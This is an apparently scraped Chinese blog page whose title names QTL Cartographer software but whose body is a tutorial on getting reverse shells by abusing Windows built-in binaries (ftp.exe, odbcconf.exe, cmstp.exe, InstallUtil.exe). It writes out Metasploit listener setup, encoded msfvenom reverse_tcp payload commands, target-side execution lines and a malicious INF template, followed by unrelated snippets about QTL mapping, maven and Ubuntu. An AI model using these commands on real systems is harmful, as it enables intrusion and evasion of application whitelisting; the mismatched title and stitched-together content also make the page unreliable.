windows qtl cartographer 2.5使用说明_windows下基于白名单获取shell的方法整理(下)...

最新推荐文章于 2022-04-11 21:37:37 发布
最新推荐文章于 2022-04-11 21:37:37 发布
阅读量171 收藏
点赞数
文章标签: windows qtl cartographer 2.5使用说明

前言

继上篇内容继续。

特别感谢Micropoor前辈

内容列表

ftp.exe

  • 通过msfvenom发起ftp攻击

ODBCCONF.exe

  • 通过rundll32.exe+ODBCCONF.exe+hta进行攻击

cmstp.exe

  • 通过msfvenom发起cmstp.exe攻击

Installutil.exe

  • 通过msfvenom发起Installutil.exe攻击

ftp.exe

Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。

Ftp.exe所在路径已被系统添加PATH环境变量中,因此,Ftp.exe命令可识别。

Windows 2003 默认位置:

C:WindowsSystem32ftp.exe

C:WindowsSysWOW64ftp.exe

Windows 7 默认位置:

C:WindowsSystem32ftp.exe

C:WindowsSysWOW64ftp.exe

msf启用监听

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.43.231msf exploit(multi/handler) >  set AutoRunScript migrate -fmsf exploit(multi/handler) > set lport 53msf exploit(multi/handler) > exploit
bb57503c451a909214b033a1f211d350.png

生成payload

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 192.168.43.231 LPORT=53 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -o payload.exe
f087e2959311917ad171dc09d9956cd1.png

靶机执行(payload传到靶机上)

echo !C:payload.exe > o &&echo quit >> o &Ftp ‐n ‐s:o &&del /F /Q o
9e789f5e5a266a307e77405a551075e1.png

ODBCCONF.exe

ODBCCONF.exe是一个命令行工具,允许配置ODBC驱动程序和数据

说明:Odbcconf.exe所在路径已被系统添加PATH环境变量中,因此,Odbcconf命令可识

别,需注意x86,x64位的Odbcconf调用。

Windows 2003 默认位置:

C:WINDOWSsystem32odbcconf.exe

C:WINDOWSSysWOW64odbcconf.exe

Windows 7 默认位置:

C:WindowsSystem32odbcconf.exe

C:WindowsSysWOW64odbcconf.exe

msf启用监听

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.43.231msf exploit(multi/handler) >  set AutoRunScript migrate -fmsf exploit(multi/handler) > set lport 53msf exploit(multi/handler) > exploit

生成dll

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 92.168.43.231 LPORT=53  -f dll -o payload.dll
b137aae8c7bfd23379b4fc4b955cbbf5.png

靶机执行以下代码(注意payload版本)

odbcconf.exe /a {regsvr C:payload.dll}
71e1a7b8bb15a93ac0f6aa42e0a8e9da.png

cmstp.exe

Cmstp安装或删除“连接管理器”服务配置文件。如果不含可选参数的情况下使用,则

cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。

说明:Cmstp.exe所在路径已被系统添加PATH环境变量中,因此,Cmstp命令可识别,需

注意x86,x64位的Cmstp调用。

Windows 2003 默认位置:

C:WindowsSystem32cmstp.exe

C:WindowsSysWOW64cmstp.exe

Windows 7 默认位置:

C:WindowsSystem32cmstp.exe

C:WindowsSysWOW64cmstp.exe

msf启用监听

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.43.231msf exploit(multi/handler) >  set AutoRunScript migrate -fmsf exploit(multi/handler) > set lport 53msf exploit(multi/handler) > exploit

准备inf文件,以下是模板

[version]Signature=$chicago$AdvancedINF=2.5[DefaultInstall_SingleUser]RegisterOCXs=RegisterOCXSection[RegisterOCXSection]C:payload.dll[Strings]AppAct = "SOFTWAREMicrosoftConnection Manager" ServiceName="safe6" ShortSvcName="safe6"

INF 文件的 RegisterOCXSection 需要包含恶意 DLL 文件的本地路径或远程执行的 WebDAV 位置

然后再靶机执行以下命令

cmstp /s safe6.inf
c7246a7f2b2370e23fa8b08e3627cdf0.png

Installutil.exe

Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来

安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用

说明:Installutil.exe所在路径没有被系统添加PATH环境变量中,因此,Installutil命令无法

识别。

生成payload用以下工具(里面写的很清楚了)

https://github.com/khr0x40sh/WhiteListEvasion

ac6fe99c2b8f30f5f4a4e62b6ad7adcd.png

临时有事,不再演示这个

weixin_40000301
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WinQTLCart
12-12
Windows QTL Cartographer maps quantitative trait loci (QTL) in cross populations from inbred lines. WinQTLCart includes a powerful graphic tool for presenting and summarizing mapping results and can import and export data in a variety of formats. WinQTLCart incorporates the modules found in its command-line sibling, QTL Cartographer, and provides a graphical interface to QTL Cartographer's features. What’s new 1. Add new function: Import – CSV format that can use to create mcd source data file. Sample file “NSimuB1-01-OnePop.csv” is in folder NCSU\WinQTLCart2.5\Examples. 2. Add function of score statistics procedures in MIM analysis. 3. Updated the User’s Manual (4/16/2010). 4. Fixed the IM, CIM permutation error. 5. Fixed errors in result graph display. 6. Add new information in MIM summary. 7. Fixed problem in Multiple Trait IM-CIM permutation. 8. Fixed problem of Category trait MIM new model. 9. Improved single marker analysis. 10. More Improvement of MIM summary. 11. Improved MIM graph display. 12. Correct error on MIM for RI cross 13. Correct error on graph display. 14. Correct error on MIM Function.
maven 加载依赖 太慢_超详细的maven安装及使用教程
weixin_39639260的博客
11-23 389
概述最近帮测试组那边弄一下jenkins,把生产线也配置一下自动发布,因为都是maven项目,所以这里把安装maven的过程先记录一下。什么是maven,有什么用?Maven是一个项目构建和管理的工具,其主要服务于基于java平台的项目构建、依赖管理和项目信息管理。它包含了一个项目对象模型 (Project Object Model),一组标准集合,一个项目生命周期Project Lifecycl...
windows qtl cartographer 2.5使用说明_甩掉windows(十):ubuntu18桌面系统优化、扩展和插件...
weixin_39851307的博客
11-29 335
1 应用程序桌面快捷图标ubuntu18安装重启之后,放置了一个垃圾筒在桌面上。我曾经安装了google chrome、dolphin、kolorPaint和Meld等这些常用的工具,还有一些Ubuntu18自带的设置、LibreOffice、ShotWell等,我想把经常使用的应用图标放在桌面上。(就像WIDNWOS上的快捷方式一样,方便自已的操作。)可是,这些应用图标只能放在DOCK上,无法放...
windows qtl cartographer 2.5使用说明_Windows 下安装memcached
weixin_39866741的博客
12-04 550
1. 去http://jehiah.cz/projects/memcached-win32下载memcache 的windows稳定版,解压放某个盘下面,比如在c:memcached。2. 在终端(也即cmd命令界面)下输入 ‘D:phpphp5wwwmemcachedmemcached.exe -d install’ 安装。3. 再输入: ‘D:phpphp5wwwmemcachedmemcac...
windows qtl cartographer 2.5使用说明_带着「Windows」去上班,WTG折腾记
weixin_39872222的博客
11-25 605
拥有 Mac 是一件让人羡慕的事情,不过最近一个哥们在买了Macbook后却要求我把给刷成Windows。原来,Mac虽好,但是很多人一开始还是用不习惯,而更让人头痛的是,一些讨厌的软件没有 Mac 版本,于是就有了我哥们的这种需求。朋友圈一问,有这样需求的用户还不少,不得不说,那咱买什么Mac啊。无论是使用虚拟机?还是装 Boot Camp?似乎都不是最好的办法。因此我给哥们推荐了Windows...
QTL Cartographer使用说明
03-22
**QTL Cartographer使用说明详解** ### 关于QTL Cartographer QTL Cartographer是一款功能强大的软件工具,专为QTL(数量性状位点)分析设计,由北卡罗来纳州立大学生物信息学研究中心开发。它适用于在遗传研究中...
WinQTLCart2.5.rar
06-24
WinQTLCart 2.5全称为Windows下的QTL Cartographer,它提供了用户友好的图形界面,使得研究人员能够便捷地处理遗传数据,进行QTL定位,并生成高质量的遗传图谱。该软件支持多种遗传模型,包括简单的F2群体、回交、双...
Mapmaker3.0_winQTLCart2.0简单中文教程和举例
09-04
本教程将详细解读这两款软件的使用方法,以中文形式呈现,方便国内研究者学习和应用。 Mapmaker3.0是一款功能强大的遗传图谱构建软件,其核心在于能够处理大量遗传标记数据,通过计算标记之间的重组频率,构建遗传...
基于惩罚最大似然方法QTL定位软件包20090626.pdf
12-24
基于惩罚最大似然方法QTL定位软件包20090626.pdf
基于小麦55K SNP芯片检测小麦穗长和株高性状QTL.pdf
07-26
基于小麦55K SNP芯片检测小麦穗长和株高性状QTL.pdf
cartographer 安装依赖cartographer、ceres-solver、protobuf
04-19
cartographer 安装依赖cartographer、ceres-solver、protobuf
windows qtl cartographer 2.5使用说明_【持久化】使用Windows API Bypass 杀软对计划任务的检测...
weixin_39949473的博客
12-08 916
相信大家在做持久化阶段的时候会遇到同一个头疼的问题。免杀倒是很好用,但在进行权限维持的过程会被杀软检测并且拦截。本文会详细的讲述Windows API Task Scheduler部分在做持久化的时候需要调用方法。杀软这个东西确实很坑,免杀好不容易做好了。直接执行创建计划任务还被拦截,真的是让人脑壳痛0x01 什么是 Task SchedulerTask schduler:任务调度程序,...
emWin在Windows使用visual studio2019仿真
热门推荐
xfxuezhang.cn
06-21 1万+
转自“野火教程”,亲测可用! emWin的Windows仿真版本是免费的,大家可以直接在Segger官网下载, 下载链接:https://www.segger.com/downloads/emwin/ 下载得到压缩包的文件名为:SeggerEval_WIN32_MSVC_MinGW_GUI_V548.zip, 它是emWin 的V5.48版本,本教程中我们就以这个版本为例子讲解。 解压该压缩包,其文件内容说明见图emWin仿真版本文件。 emWin仿真版本的工程在Windows上是使用...
cartographer_windows配置问题
chill_chill的博客
04-11 676
运行前,配置(dll-lib-VS15/)路径下的dll文件
10 软件源_WinQTLCartographer软件之QTL分析
weixin_31714033的博客
12-28 4421
集思慧远又一QTL软件分析来啦!今天小编要跟大家分享的是WinQTLCart。WinQTLCart是北卡罗来纳州立大学发布的一款在windows下运行的QTL软件,目前最新版本为V2.5_011。WinQTLCart可以适用BC1,DH,RIL,F2等群体,但是不能使用CP群体进行分析,可以使用IM(区间作图法),CIM(复合区间作图法),MIM(多区间作图法)进行QTL的分析,这个软件...
Cartographer安装与配置
幺幺零肆
10-09 760
Cartographer安装与配置 正好最近因为论文需要,又配置了一遍Cartographer并跑通了,于是想趁着热乎劲,将配置过程记录下来。 Cartographer安装 这里贴出官方给的参考文档Cartographer官方安装教程,不需要翻墙,可以参考一下。 我个人对照网上的教程实测下来的步骤总结如下: 1、首先做好前期工作 //安装 rosdep 和 ninja sudo apt-get u...
cartographer安装与测试
m0_46588743的博客
10-22 1222
文章目录前言安装双系统在windows系统中下载Ubuntu18.04的镜像文件通过USBWriter软件将镜像文件写入U盘重启电脑,按ESC健(华硕)选择U盘进入安装ROSMelodic安装cartographer测试cartographer是否安装成功 前言 之前在ubuntu20.04rosmelodic(双系统)版本上下载cartographer总是不成功,可能是学习slam过程中安装的依赖库与catographer版本冲突的问题。索性在windows系统下直接删除了ubuntu20.04所在的卷,
UBUNTU 20.04 安装STM32CubeMX
ljd6363的博客
12-25 2634
UBUNTU 20.04 安装STM32CubeMX下载STM32CubeMX解压STM32CubeMX压缩包安装STM32CubeMX设置启动STM32CubeMX命令打开STM32CubeMX 下载STM32CubeMX 官方下载地址 本人下载的是v6-1-1版本,下面以次版本为例 STM32CubeMX需要JKD支持 本人安装openjdk ,具体信息如下 openjdk 14.0.2 2020-07-14 OpenJDK Runtime Environment (build 14.0.2+12-Ub
cartographer 最新版安装测试
weixin_30838921的博客
10-21 326
在官网的基础上稍加修改,但保证代码都是最新的 我的系统配置: Debian9 strech, ROS lunar 该方法对 ubuntu 系列操作系统以及其他ROS版本同样适用。 1. 安装依赖库 sudo apt-get install -y \ g++ \ git \ google-mock \ libboost-all-dev ...
Windows QTL Cartographer 2.0 用户手册:基因位点挖掘工具
"Windows QTL Cartographer 2.0 是一个专用于植物遗传学研究的软件,主要用于数量性状的遗传分析和基因型与表型的连锁分析,旨在挖掘影响重要农艺性状的基因位点。该软件由N.C.State University的Bioinformatics ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值